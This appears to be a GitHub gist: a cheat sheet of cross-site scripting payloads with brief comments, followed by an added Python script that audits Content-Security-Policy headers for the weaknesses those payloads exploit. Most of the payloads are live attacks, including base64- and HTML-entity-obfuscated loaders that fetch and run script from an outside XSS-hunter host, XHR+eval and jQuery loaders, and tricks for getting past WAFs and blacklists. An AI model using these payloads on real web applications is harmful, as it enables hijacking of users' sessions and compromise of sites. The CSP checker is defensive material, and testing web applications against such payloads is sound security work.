@Uyavuz24
Last active October 11, 2020 19:02
There are also descriptions.
<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> // When CSP disallows inline JS but allows S3 buckets. The "<script>" tag doesn't work, but there is HTML injection!!
<svg/onload=alert(1)> //this is everywhere
<img src=x onerror=alert(document.domain)> //this is also everywhere
"><script src=https://ubey.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') // For use where URIs are taken as input.
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags are explicitly filtered.
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> //HTML5 payload, only works in Firefox, Chrome and Opera
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;ubey.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ubey.xss.ht");a.send();</script> //For exploitation of web applications with Content Security Policies containing script-src but have unsafe-inline enabled.
<script>$.getScript("//ubey.xss.ht")</script> // Example payload for sites that include jQuery.
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<!<script>alert(1)</script> //AWS WAF
<h2
<h2>
"test
'test
<h2?
<%0dh2
</script/x>
<sCriPt>
!'+%&/()=?_-<|>"
fileformat.info unicode chars, hex, encoded
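Added example, not part of the gist: a small Python checker for the Content-Security-Policy weaknesses the payloads above rely on (script-src with 'unsafe-inline', 'unsafe-eval', a wildcard, or a whole shared-storage service such as s3.amazonaws.com where anyone can create a bucket). The sample policies, the nonce value and the shared-storage host list are constructed for this example.

```python
import re

# Services where any third party can publish a file (constructed list, not exhaustive).
SHARED_STORAGE_HOSTS = ("s3.amazonaws.com", "storage.googleapis.com", "blob.core.windows.net")

def parse_csp(header):
    """Split a CSP header into {directive: [source, ...]}; the first copy of a directive wins, as in browsers."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy

def host_of(source):
    """Reduce a host-source such as https://*.s3.amazonaws.com:443/x to s3.amazonaws.com."""
    host = re.sub(r"^[a-z][a-z0-9+.-]*://", "", source, flags=re.I)
    host = host.split("/")[0].split(":")[0]
    return host.lstrip("*.").lower()

def audit_script_src(header):
    """Return findings (strings) for the effective script-src; an empty list means nothing was flagged."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return ["no script-src or default-src: scripts are unrestricted"]
    lowered = [s.lower() for s in sources]
    findings = []
    # Browsers ignore 'unsafe-inline' once a nonce or hash is present, so only flag it when neither is.
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered)
    if "'unsafe-inline'" in lowered and not has_nonce_or_hash:
        findings.append("'unsafe-inline': injected <script> blocks run (the XHR+eval payload needs only this)")
    if "'unsafe-eval'" in lowered:
        findings.append("'unsafe-eval': eval(atob(...)) style payloads run")
    for src in lowered:
        host = host_of(src)
        if src in ("https:", "http:") or host == "":          # '*', 'https://*', 'https:' ...
            findings.append(f"wildcard source {src}: any remote script loads")
        elif host in SHARED_STORAGE_HOSTS:                     # whole service, not one named bucket
            findings.append(f"shared storage host {src}: any bucket on that service can serve a script")
    return findings

# Constructed sample policies: the weak one matches the srcdoc-iframe scenario above.
WEAK_CSP = "default-src 'self'; script-src 'self' https://*.s3.amazonaws.com 'unsafe-inline'"
HARDENED_CSP = "default-src 'self'; script-src 'self' 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'"
```

A nonce or hash plus 'strict-dynamic' removes the host allowlist entirely, which is why the hardened policy has nothing to flag.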